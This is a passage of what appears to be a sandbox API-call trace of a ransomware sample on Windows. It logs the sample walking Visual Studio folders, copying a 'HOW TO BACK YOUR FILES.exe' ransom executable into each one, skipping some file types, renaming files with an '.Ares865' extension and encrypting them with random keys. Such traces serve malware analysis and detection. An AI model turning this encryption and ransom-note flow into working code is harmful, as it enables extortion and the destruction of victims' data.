8\\VSTA\\Bin\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033" [0128.586] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033" [0128.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.588] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.588] GetLastError () returned 0x0 [0128.589] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.589] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x525207a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x525207a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.589] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.589] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.589] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTAClientPkgUI.dll" | out: lpString1="VSTAClientPkgUI.dll") returned="VSTAClientPkgUI.dll" [0128.589] lstrlenW (lpString="VSTAClientPkgUI.dll") returned 19 [0128.589] lstrlenW (lpString="Ares865") returned 7 [0128.589] lstrcmpiW (lpString1="gUI.dll", lpString2="Ares865") returned 1 [0128.589] lstrlenW (lpString=".dll") returned 4 [0128.589] lstrcmpiW (lpString1="VSTAClientPkgUI.dll", lpString2=".dll") returned 1 [0128.589] lstrlenW (lpString=".lnk") returned 4 [0128.589] lstrcmpiW (lpString1="VSTAClientPkgUI.dll", lpString2=".lnk") returned 1 [0128.589] lstrlenW (lpString=".ini") returned 4 [0128.589] lstrcmpiW (lpString1="VSTAClientPkgUI.dll", lpString2=".ini") returned 1 [0128.589] lstrlenW (lpString=".sys") returned 4 [0128.589] lstrcmpiW (lpString1="VSTAClientPkgUI.dll", lpString2=".sys") returned 1 [0128.589] lstrlenW (lpString="VSTAClientPkgUI.dll") returned 19 [0128.590] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.Ares865") returned 90 [0128.590] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll.ares865"), dwFlags=0x1) returned 1 [0128.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAClientPkgUI.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaclientpkgui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.591] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11104) returned 1 [0128.592] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.592] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.592] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.592] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e60, lpName=0x0) returned 0x170 [0128.594] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e60) returned 0x190000 [0128.601] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.602] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VSTAProjectUI.dll" | out: lpString1="VSTAProjectUI.dll") returned="VSTAProjectUI.dll" [0128.602] lstrlenW (lpString="VSTAProjectUI.dll") returned 17 [0128.602] lstrlenW (lpString="Ares865") returned 7 [0128.602] lstrcmpiW (lpString1="tUI.dll", lpString2="Ares865") returned 1 [0128.602] lstrlenW (lpString=".dll") returned 4 [0128.602] lstrcmpiW (lpString1="VSTAProjectUI.dll", lpString2=".dll") returned 1 [0128.602] lstrlenW (lpString=".lnk") returned 4 [0128.602] lstrcmpiW (lpString1="VSTAProjectUI.dll", lpString2=".lnk") returned 1 [0128.603] lstrlenW (lpString=".ini") returned 4 [0128.603] lstrcmpiW (lpString1="VSTAProjectUI.dll", lpString2=".ini") returned 1 [0128.603] lstrlenW (lpString=".sys") returned 4 [0128.603] lstrcmpiW (lpString1="VSTAProjectUI.dll", lpString2=".sys") returned 1 [0128.603] lstrlenW (lpString="VSTAProjectUI.dll") returned 17 [0128.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll.Ares865") returned 88 [0128.603] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll.ares865"), dwFlags=0x1) returned 1 [0128.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31064) returned 1 [0128.607] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.608] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.608] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.608] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c60, lpName=0x0) returned 0x170 [0128.609] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c60) returned 0x190000 [0128.622] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.624] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK" [0128.624] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK" [0128.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\sdk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.625] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.625] GetLastError () returned 0x0 [0128.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.626] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.626] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7" [0128.626] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7" [0128.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.628] GetLastError () returned 0x0 [0128.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.628] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.628] lstrcpyW (in: lpString1=0x2cce472, lpString2="IDE" | out: lpString1="IDE") returned="IDE" [0128.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0128.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0128.628] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0128.628] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0128.628] lstrcmpiW (lpString1="Packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.628] lstrcmpiW (lpString1="Packages", lpString2="aoldtz.exe") returned 1 [0128.629] lstrcpyW (in: lpString1=0x2cce472, lpString2="Packages" | out: lpString1="Packages") returned="Packages" [0128.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0128.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0128.629] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0128.629] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 0 [0128.629] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.629] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0128.629] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages" [0128.629] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages" [0128.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.630] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.630] GetLastError () returned 0x0 [0128.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.630] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.631] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.631] lstrcpyW (in: lpString1=0x2cce484, lpString2="Debugger" | out: lpString1="Debugger") returned="Debugger" [0128.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0128.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x31afc8 [0128.631] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0128.631] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52546900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.631] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.631] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52546900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0128.631] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.631] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0128.631] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger" [0128.632] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger" [0128.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\packages\\debugger\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.632] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.633] GetLastError () returned 0x0 [0128.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.633] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x52546900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52546900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.633] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.633] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE" [0128.634] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE" [0128.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.635] GetLastError () returned 0x0 [0128.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.635] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5256ca60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5256ca60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.635] lstrcpyW (in: lpString1=0x2cce47a, lpString2="PrivateAssemblies" | out: lpString1="PrivateAssemblies") returned="PrivateAssemblies" [0128.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0128.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x320fc8 [0128.635] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0128.635] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52694b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublicAssemblies", cAlternateFileName="PUBLIC~1")) returned 1 [0128.635] lstrcmpiW (lpString1="PublicAssemblies", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.635] lstrcmpiW (lpString1="PublicAssemblies", lpString2="aoldtz.exe") returned 1 [0128.636] lstrcpyW (in: lpString1=0x2cce47a, lpString2="PublicAssemblies" | out: lpString1="PublicAssemblies") returned="PublicAssemblies" [0128.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0128.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x321070 [0128.636] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0128.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: 